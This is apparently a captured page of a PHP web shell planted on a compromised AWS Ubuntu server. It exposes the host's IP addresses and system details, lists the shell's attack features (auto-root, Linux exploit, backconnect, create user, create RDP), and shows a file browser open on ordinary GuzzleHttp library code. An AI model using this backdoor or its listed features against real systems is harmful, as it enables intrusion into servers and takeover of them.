Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 13.59.36.4
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
aws /
GuzzleHttp /
Psr7 /
[ HOME SHELL ]
Name
Size
Permission
Action
AppendStream.php
5.59
KB
-rwxr-xr-x
BufferStream.php
2.97
KB
-rwxr-xr-x
CachingStream.php
4.15
KB
-rwxr-xr-x
DroppingStream.php
1.05
KB
-rwxr-xr-x
FnStream.php
3.84
KB
-rwxr-xr-x
InflateStream.php
1.78
KB
-rwxr-xr-x
LazyOpenStream.php
880
B
-rwxr-xr-x
LimitStream.php
4.11
KB
-rwxr-xr-x
MessageTrait.php
5.78
KB
-rwxr-xr-x
MultipartStream.php
4.58
KB
-rwxr-xr-x
NoSeekStream.php
424
B
-rwxr-xr-x
PumpStream.php
3.94
KB
-rwxr-xr-x
Request.php
3.63
KB
-rwxr-xr-x
Response.php
4.68
KB
-rwxr-xr-x
Rfc7230.php
684
B
-rwxr-xr-x
ServerRequest.php
9.59
KB
-rwxr-xr-x
Stream.php
6.62
KB
-rwxr-xr-x
StreamDecoratorTrait.php
3.2
KB
-rwxr-xr-x
StreamWrapper.php
3.67
KB
-rwxr-xr-x
UploadedFile.php
7.37
KB
-rwxr-xr-x
Uri.php
21
KB
-rwxr-xr-x
UriNormalizer.php
8.12
KB
-rwxr-xr-x
UriResolver.php
8.57
KB
-rwxr-xr-x
functions.php
26.06
KB
-rwxr-xr-x
functions_include.php
156
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Request.php
<?php namespace GuzzleHttp\Psr7; use InvalidArgumentException; use Psr\Http\Message\RequestInterface; use Psr\Http\Message\StreamInterface; use Psr\Http\Message\UriInterface; /** * PSR-7 request implementation. */ class Request implements RequestInterface { use MessageTrait; /** @var string */ private $method; /** @var null|string */ private $requestTarget; /** @var UriInterface */ private $uri; /** * @param string $method HTTP method * @param string|UriInterface $uri URI * @param array $headers Request headers * @param string|null|resource|StreamInterface $body Request body * @param string $version Protocol version */ public function __construct( $method, $uri, array $headers = [], $body = null, $version = '1.1' ) { $this->assertMethod($method); if (!($uri instanceof UriInterface)) { $uri = new Uri($uri); } $this->method = strtoupper($method); $this->uri = $uri; $this->setHeaders($headers); $this->protocol = $version; if (!isset($this->headerNames['host'])) { $this->updateHostFromUri(); } if ($body !== '' && $body !== null) { $this->stream = stream_for($body); } } public function getRequestTarget() { if ($this->requestTarget !== null) { return $this->requestTarget; } $target = $this->uri->getPath(); if ($target == '') { $target = '/'; } if ($this->uri->getQuery() != '') { $target .= '?' . $this->uri->getQuery(); } return $target; } public function withRequestTarget($requestTarget) { if (preg_match('#\s#', $requestTarget)) { throw new InvalidArgumentException( 'Invalid request target provided; cannot contain whitespace' ); } $new = clone $this; $new->requestTarget = $requestTarget; return $new; } public function getMethod() { return $this->method; } public function withMethod($method) { $this->assertMethod($method); $new = clone $this; $new->method = strtoupper($method); return $new; } public function getUri() { return $this->uri; } public function withUri(UriInterface $uri, $preserveHost = false) { if ($uri === $this->uri) { return $this; } $new = clone $this; $new->uri = $uri; if (!$preserveHost || !isset($this->headerNames['host'])) { $new->updateHostFromUri(); } return $new; } private function updateHostFromUri() { $host = $this->uri->getHost(); if ($host == '') { return; } if (($port = $this->uri->getPort()) !== null) { $host .= ':' . $port; } if (isset($this->headerNames['host'])) { $header = $this->headerNames['host']; } else { $header = 'Host'; $this->headerNames['host'] = 'Host'; } // Ensure Host is the first header. // See: http://tools.ietf.org/html/rfc7230#section-5.4 $this->headers = [$header => [$host]] + $this->headers; } private function assertMethod($method) { if (!is_string($method) || $method === '') { throw new \InvalidArgumentException('Method must be a non-empty string.'); } } }
Close